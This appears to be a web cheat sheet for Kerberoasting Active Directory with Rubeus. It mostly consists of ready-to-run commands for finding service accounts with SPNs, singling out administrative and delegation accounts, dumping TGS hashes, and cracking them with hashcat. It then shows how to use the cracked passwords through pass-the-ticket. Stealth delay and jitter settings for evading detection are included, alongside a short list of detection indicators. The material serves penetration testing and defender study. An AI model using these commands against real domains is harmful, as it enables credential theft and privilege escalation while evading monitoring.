Kerberoasting is one of the most effective post-compromise attacks for escalating privileges in Active Directory environments by targeting service accounts with weak passwords.
Overview Kerberoasting attacks request service tickets for accounts with Service Principal Names (SPNs) and extract the ticket’s encrypted portion for offline password cracking. This technique exploits the fact that service tickets are encrypted with the target service account’s password hash.
Service Discovery Identify accounts with Service Principal Names
Ticket Extraction Request and extract encrypted service tickets
Offline Cracking Crack extracted hashes with external tools
Attack Methodology
SPN Discovery
Identify service accounts in the domain with registered SPNs
Ticket Request
Request TGS tickets for target service accounts
Hash Extraction
Extract encrypted portion of service tickets
Offline Cracking
Use hashcat or John to crack the extracted hashes
Credential Validation
Test cracked credentials for access and privileges
Syntax Variations Basic Usage
Advanced Targeting
OPSEC Mode
All Service Accounts
Specific Service
Specific User
# Target all service accounts in domain Rubeus.exe kerberoast
Targeting Parameters Target specific Service Principal Name Example: MSSQLSvc/sql01.corp.local:1433
File containing list of SPNs to target One SPN per line: MSSQLSvc/sql01.corp.local:1433 HTTP/web01.corp.local CIFS/fileserver.corp.local Target specific username with SPNs
File containing list of usernames to target
Custom LDAP filter for advanced targeting
admincount=1 - Administrative accountsserviceprincipalname=* - Any account with SPNssamaccountname=svc_* - Service accounts by naming patternuseraccountcontrol:1.2.840.113556.1.4.803:=512 - Normal accounts only Target specific Organizational Unit Example: "OU=Service Accounts,DC=corp,DC=local"
Target domain (default: current domain)
Specific domain controller to query
Hash output format for cracking tools
hashcat (default) - Hashcat mode 13100john - John the Ripper format Save extracted hashes to file
Don’t wrap long lines in output
Output only the crackable hash portion
Enable OPSEC-safe features Recommended for stealth operations
Delay in milliseconds between requests Recommended: 3000-10000ms for stealth
Random percentage variation in delay (0-100) Example: 30 = ±30% variation in delay
Request AES256 encryption (less common, more suspicious)
Display statistics about service accounts
Limit number of results returned
Only target accounts with passwords set after date Useful for targeting recently changed passwords
Only target accounts with passwords set before date Useful for targeting old, potentially weak passwords
Complete Attack Workflow
Initial Reconnaissance
Discover service accounts and assess the target environment: # Get statistics about service accounts Rubeus.exe kerberoast /stats # Target administrative service accounts Rubeus.exe kerberoast /ldapfilter:"admincount=1" /stats
OPSEC-Safe Extraction
Perform the actual kerberoasting with stealth considerations: # OPSEC-safe kerberoasting with delays Rubeus.exe kerberoast /opsec /delay:5000 /jitter:30 /outfile:hashes.txt # Target specific high-value accounts Rubeus.exe kerberoast /user:svc_sql /opsec /format:hashcat
Hash Processing
Prepare hashes for cracking with external tools: # Extract hashes to file Rubeus.exe kerberoast /outfile:hashcat_hashes.txt /format:hashcat /nowrap # Verify hash format head -n 5 hashcat_hashes.txt
Offline Cracking
Use hashcat or John the Ripper to crack the extracted hashes: # Basic dictionary attack hashcat -m 13100 hashcat_hashes.txt /usr/share/wordlists/rockyou.txt # Advanced rule-based attack hashcat -m 13100 hashcat_hashes.txt wordlist.txt -r rules/best64.rule # Mask attack for corporate passwords hashcat -m 13100 hashcat_hashes.txt -a 3 ?u?l?l?l?l?l?d?d?d?s
Credential Validation
Test cracked credentials for access and privileges: # Test cracked service account Rubeus.exe asktgt /user:svc_sql /password:CrackedPassword123! /ptt # Enumerate accessible services Rubeus.exe asktgs /service:cifs/fileserver.corp.local Advanced Targeting Strategies High-Value Targets
Password Age Targeting
Organizational Targeting
Show Administrative Service Accounts
# Accounts with administrative privileges Rubeus.exe kerberoast /ldapfilter:"admincount=1" # Accounts in privileged groups Rubeus.exe kerberoast /ldapfilter:"memberof=CN=Domain Admins,CN=Users,DC=corp,DC=local" Show Delegation-Enabled Accounts
# Constrained delegation accounts Rubeus.exe kerberoast /ldapfilter:"msds-allowedtodelegateto=*" # Unconstrained delegation (high value) Rubeus.exe kerberoast /ldapfilter:"useraccountcontrol:1.2.840.113556.1.4.803:=524288" Show Service-Specific Targeting
# SQL Server service accounts Rubeus.exe kerberoast /ldapfilter:"serviceprincipalname=MSSQLSvc*" # Exchange service accounts Rubeus.exe kerberoast /ldapfilter:"serviceprincipalname=exchangeMDB*" # IIS/Web service accounts Rubeus.exe kerberoast /ldapfilter:"serviceprincipalname=HTTP*" OPSEC Considerations Detection Risk : Kerberoasting generates TGS requests that can be monitored by security tools and may appear in domain controller logs.
Hide Domain Controller Logs
Event ID 4769 - Kerberos TGS Request:
High volume of TGS requests from single source
Requests for service accounts not typically accessed
RC4 encryption requests in AES-only environments
Requests for administrative service accounts
Unusual Kerberos traffic patterns
High frequency of TGS requests
Traffic to domain controllers from non-standard sources
LDAP queries for service principal names
Show Host-Based Detection
Processes making unusual Kerberos API calls
Memory access patterns consistent with ticket extraction
File creation in temp directories (hash output files)
Execution of password cracking tools
Troubleshooting No Results
Access Denied
Cracking Issues
Problem : No kerberoastable users foundSolutions :
Verify LDAP connectivity to domain controllers
Check user permissions for LDAP queries
Confirm service accounts exist with SPNs
Try broader LDAP filters
# Test LDAP connectivity Rubeus.exe kerberoast /stats # Try different targeting Rubeus.exe kerberoast /ldapfilter:"serviceprincipalname=*"
BloodHound Integration Use BloodHound to identify high-value service accounts before kerberoasting
Hashcat/John Process extracted hashes with dedicated password cracking tools
Impacket Integration Use GetUserSPNs.py for alternative SPN enumeration and targeting
PowerView Integration Combine with PowerView for enhanced Active Directory reconnaissance
